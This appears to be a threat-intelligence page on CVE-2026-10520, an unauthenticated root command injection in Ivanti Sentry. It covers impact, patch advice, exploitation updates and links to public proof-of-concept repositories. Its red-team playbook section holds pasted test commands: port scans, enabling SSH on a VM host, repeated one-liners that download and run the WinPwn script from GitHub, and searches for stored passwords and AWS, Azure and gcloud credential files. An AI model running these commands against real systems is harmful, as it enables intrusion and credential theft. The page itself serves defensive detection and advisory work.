CVE-2026-10520
Overview
The vulnerability is an OS command injection rooted in improper input validation within Ivanti Sentry's command execution routines. Specifically, the affected component fails to sanitize user-supplied input before passing it to underlying system shell commands. This flaw exists in versions prior to R10.5.2, R10.6.2, and R10.7.1, impacting the command processing mechanism that interfaces with the operating system shell.
Vulnerability Description
An OS Command Injection vulnerability in Ivanti Sentry before the R10.5.2, R10.6.2 and R10.7.1 versions allows a remote unauthenticated user to achieve root-level remote code execution
Impact
An unauthenticated attacker can execute arbitrary operating system commands with root privileges on the affected Ivanti Sentry server. This enables full system compromise, including unauthorized access to sensitive data, modification or destruction of system files, and potential lateral movement within the network. No user interaction or credentials are required, significantly increasing the attack surface and risk of exploitation in exposed environments.
Solution
Ivanti has released security updates addressing this vulnerability in Ivanti Sentry versions R10.5.2, R10.6.2, and R10.7.1. Administrators should apply these patches immediately to remediate the issue. Detailed patch instructions and advisory information are available at Ivanti's official security advisory portal: https://hub.ivanti.com/s/article/Security-Advisory-Ivanti-Sentry-CVE-2026-10520-CVE-2026-10523?language=en_US
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The OS Command Injection vulnerability in Ivanti Sentry presents a critical security risk, allowing remote unauthenticated users to execute arbitrary commands on the host system. This vulnerability arises from improper validation of user-supplied input, which enables attackers to manipulate command execution flows. By exploiting this flaw, an adversary can inject malicious commands that the system will execute with root privileges, leading to unauthorized access and control over the affected system. The severity of this vulnerability is underscored by its perfect score on the CVSS scale, indicating that it poses an extreme threat to the integrity and confidentiality of the systems involved.
Attack vectors for this vulnerability are particularly concerning due to the ease with which an attacker can exploit it. An attacker could leverage various methods, such as crafting specially formatted HTTP requests or using command-line tools to send malicious payloads to the Ivanti Sentry service. Once the payload is executed, the attacker can gain root-level access, allowing them to manipulate system files, install malware, or exfiltrate sensitive data. Scenarios could include an attacker using this vulnerability to pivot within a network, escalating privileges to access other systems, or deploying ransomware to encrypt critical data, thereby crippling business operations.
The real-world impact of this vulnerability is profound, particularly for organizations that rely on Ivanti Sentry for mobile device management and security. Given the increasing reliance on mobile devices in enterprise environments, the potential for widespread disruption is significant. An attacker exploiting this vulnerability could not only compromise sensitive corporate data but also damage the organization's reputation and erode customer trust. The financial implications could be severe, including costs associated with incident response, system recovery, and potential regulatory fines for data breaches. Furthermore, the long-term effects on business continuity and operational integrity could be devastating, especially for industries that handle sensitive information, such as healthcare and finance.
To effectively detect and mitigate this vulnerability, organizations should adopt a multi-layered security approach. Regularly updating and patching systems is crucial, as the vendor has released updates that address this vulnerability in specific versions of Ivanti Sentry. Implementing robust input validation and sanitization measures can help prevent command injection attacks. Additionally, employing intrusion detection systems (IDS) and web application firewalls (WAF) can provide an added layer of security by monitoring for unusual patterns of behavior that may indicate an attempted exploitation. Organizations should also conduct regular security assessments and penetration testing to identify and remediate vulnerabilities before they can be exploited by malicious actors.
In conclusion, the OS Command Injection vulnerability in Ivanti Sentry represents a critical threat that necessitates immediate attention from organizations utilizing this software. The potential for remote code execution by unauthenticated users poses significant risks, including unauthorized access to sensitive data and disruption of business operations. By implementing proactive detection and mitigation strategies, organizations can safeguard their systems against this and similar vulnerabilities, ensuring the integrity and security of their IT environments.
CSURFACE threat intelligence has detected a marked escalation in exploitation activity targeting CVE-2026-10520, highlighted by the emergence of multiple new proof-of-concept exploits publicly available on GitHub. This development significantly lowers the barrier for threat actors to weaponize the vulnerability, increasing the likelihood of widespread exploitation. Concurrently, the vulnerability’s inclusion in the CISA Known Exploited Vulnerabilities (KEV) catalog underscores its elevated priority for defensive action and signals recognition by federal cybersecurity authorities of its critical risk. Our telemetry confirms a sharp uptick in exploitation attempts, correlating with the increased availability of automated scanning and exploitation tools. Notably, the association of a ransomware group with this vulnerability introduces a new dimension of risk, as it suggests potential integration into ransomware campaigns, thereby amplifying the threat’s impact on affected organizations. The updated CVSS score of 10.0 and a substantial EPSS score further reflect the heightened exploitability and urgency. Collectively, these changes elevate the threat level to critical, demanding heightened vigilance from defenders monitoring Ivanti Sentry environments.
Update 2 — June 20, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation activity targeting CVE-2026-10520, evidenced by a significant uptick in detection telemetry and a corresponding rise in the Exploit Prediction Scoring System (EPSS) metric. This increase aligns with the emergence of new proof-of-concept exploit tools publicly available on multiple platforms, which have lowered the barrier for adversaries to conduct automated scanning and remote code execution attempts against vulnerable Ivanti Sentry deployments. Although no new ransomware group associations have been confirmed, the expanding exploit landscape intensifies the risk of opportunistic attacks and potential integration into future ransomware campaigns. The elevated EPSS score, now approaching the highest percentile, underscores the growing likelihood of widespread exploitation. Collectively, these developments elevate the threat posture from high to critical, signaling an urgent need for defenders to enhance monitoring and incident response capabilities around Ivanti Sentry environments.
Update 3 — July 08, 2026
CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting the Ivanti Sentry vulnerability, accompanied by the emergence of additional proof-of-concept exploit tools circulating publicly. This expanded exploit landscape enhances adversaries’ capabilities to conduct remote code execution at root level without authentication, raising the overall attack surface. Although ransomware group involvement remains unconfirmed, the availability of new exploitation resources lowers the barrier for opportunistic threat actors to weaponize this vulnerability. Correspondingly, the EPSS score has inched upward, reflecting a marginal but meaningful rise in the probability of exploitation. These developments collectively reinforce the critical threat level, indicating a persistent and growing risk that necessitates heightened vigilance in monitoring and response efforts within affected environments.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Ivanti | Standalone Sentry | All |
cpe:2.3:a:ivanti:standalone_sentry:*:*:*:*:*:*:*:*
|
|
|
Ivanti | Standalone Sentry | 10.7.0 |
cpe:2.3:a:ivanti:standalone_sentry:10.7.0:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (6)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
watchtowrlabs/watchTowr-vs-Ivanti-Sentry-RCE-CVE-2026-10520-CVE-2026-10523
|
watchtowrlabs | 14 | 4 | 2026-06-09 | View |
|
0xBlackash/CVE-2026-10520
CVE-2026-10520
|
0xBlackash | 4 | 0 | 2026-06-11 | View |
|
ogenich/CVE-2026-10520
CVE-2026-10520 - Ivanti Sentry Pre-Auth OS Command Injection Mass Scanner
|
ogenich | 2 | 0 | 2026-06-10 | View |
|
HORKimhab/CVE-2026-10520-10523
CVE-2026-10520 and CVE-2026-10523
|
HORKimhab | 0 | 1 | 2026-06-11 | View |
|
emilliewatson96/spryCVE-2026-10520
|
emilliewatson96 | 0 | 0 | 2026-07-01 | View |
|
error-inside/CVE-2026-10520
Root-Level RCE via OS Command Injection in Ivanti Sentry
|
error-inside | 0 | 0 | 2026-06-18 | View |
Threat Feed
24 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
47%
|
High | High | |
| CAPEC-6 | Argument Injection |
46%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
40%
|
Medium | High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2026-10520 |
| hub.ivanti.com |
GitHub CVE
|
https://hub.ivanti.com/s/article/Security-Advisory-Ivanti-Sentry-CVE-2026-10520-CVE-2026-10523?language=en_US |
| github.com |
NVD API
|
https://github.com/watchtowrlabs/watchTowr-vs-Ivanti-Sentry-RCE-CVE-2026-10520-CVE-2026-10523 |
| cisa.gov |
NVD API
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-10520 |